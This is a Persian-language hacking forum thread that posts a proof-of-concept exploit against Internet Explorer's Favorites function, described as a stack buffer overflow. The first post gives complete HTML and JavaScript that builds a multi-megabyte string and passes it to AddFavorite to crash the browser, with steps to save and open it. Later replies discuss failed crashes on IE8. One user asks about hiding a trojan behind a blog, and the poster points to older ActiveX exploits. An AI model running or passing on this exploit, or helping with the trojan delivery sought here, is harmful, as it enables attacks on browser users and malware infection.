حفره امنیتی جدید در اینترنت اکسپلورر (همه نسخه ها)

[IISecurity.C]

این حفره امنیتی که از نوع Stack Buffer Overflow میباشد و در بخش :
Favourites وجود دارد که هکر با دادن یک ادرس با , میتواند موجب کرش کردن مرورگر شود :

کد:

('http://'+str,'Crash')

یک فایل متنی باز کرده و متن زیر را کپی کنید :

کد:

<html>
<head>
<script language="javascirpt" type="Text/javascirpt">
function go()
{
    var str =unescape('%u4141');
    var finalstr = createInlineBuffer(str, 5150000);
    var len = finalstr.length;
    document.write(len);
    addfav(finalstr);
}
              
/* Effient in-line creation */
function createInlineBuffer (str, num) {
    var i = Math.ceil(Math.log(num) / Math.LN2);
        res = str;
    do {
        res += res;
    } while (0 < --i);
    return res.slice(0, str.length * num);
}

/* Vulnerable Function */
function addfav(str)
   {
   if (document.all)
      {
      window.external.AddFavorite
      ('http://'+str,'Crash')
      }
   }
</script>
</head>
<body>
<a href="javascirpt:go()">Add To Favorites</a>
</body>
</html>

با پسوند html یا html ذخیره کرده با IE باز کنید
حالا کافیه روی Add To Favorites کلیک کنید
سوالی بود بپرسید

[Mr.pRoGraMmer]

سلام
ببخشید یه سوال داشتم میشه پشت وبلاگ تروجان گذاشت و روی مرورگر اینترنت اکسپلور 8 هم جواب بده تا حالا واسه اینترنت اکسپلور 8 نتونستم شما میتونید کاری کنید که رو اینترنت اکسپلور 8 جواب بده؟

[IISecurity.C]

قبلا یه بار توضیح دادم .الانم فعلا دارم روی فایرفاکس کار میکنم متاسفانه موقع دانلود اررور میده اگه بر طرفش کنم میرم سراغ IE ولی بهترین راه اکتیو ایکس توصیه میکنم اکتیو اکس های نسخه های قبل رو مطالعه کنی مثل 7

[babyy]

سلام

واسه من کرش نشدا !!!
ie هشت هستش ، ولی چیزی نشد
----------------------------
یه سوال !!
کرش به چه دردی میخوره ؟؟
مرورگر هنگ میکنه ، بدش بسته میشه ، چطور میشه از کرش به نفع خودمون استفاده کنیم ؟؟؟

یه توضیح بدید سپاسگزارم.

[amirjan]

سلام .
اول اینکه با اجازه آقای IISecurity.C من پست اول رو ویرایش کردم .
بدنه اصلی exploit رو توی تگ code قرار دادم تا خوانا تر بشه .
و یک نکته دیگه رو هم به دوستان یاد آوار بشم : به دلیل جلوگیری از بروز حملاتی نظیر XSS اجازه استفاده از کلمه "جاوا اسکریپت" به صورت لاتین ، در پست ها رو ندارید . دوستان توجه کنن که جای حروف r و i در کلمه "جاوا اسکریپت" با هم عوض شدن . ممکنه در اجرای کد به مشکل بر بخورید .

و اما درباره آسیب پذیری Stack Buffer Overflow باید بگم که لزوما این باگ باعث crash کردن نرم افزار نمیشه . استفاده ی اصلی هکر ها از این قبیل باگ ها ، دسترسی به مکان های غیر مجاز حافظه هست . برای اطلاعات بیشتر به ویکی پدیا رجوع کنید .

[IISecurity.C]

این حملات بیشتر برای جلو گیری از فعالیت و یا از کار انداختن و کلا اختلال در سیستم ها مورد استفاده قرار میگیره (البته با حملات ترکیبی میتوان دسترسی گرفت ) مانند از کار انداختن فایروال و ...

[Payman62]

سلام.
کسپر جلوش رو گرفت. فکر میکنم به خاطر کد جاوا اسکریپتشه.

[IISecurity.C]

خوبی کسپر به اینه که راحت سورس رو پویش میکنه .البته سورس رو بهش شناسوندن چون موردی نداره که بخواد الگویی گیر بده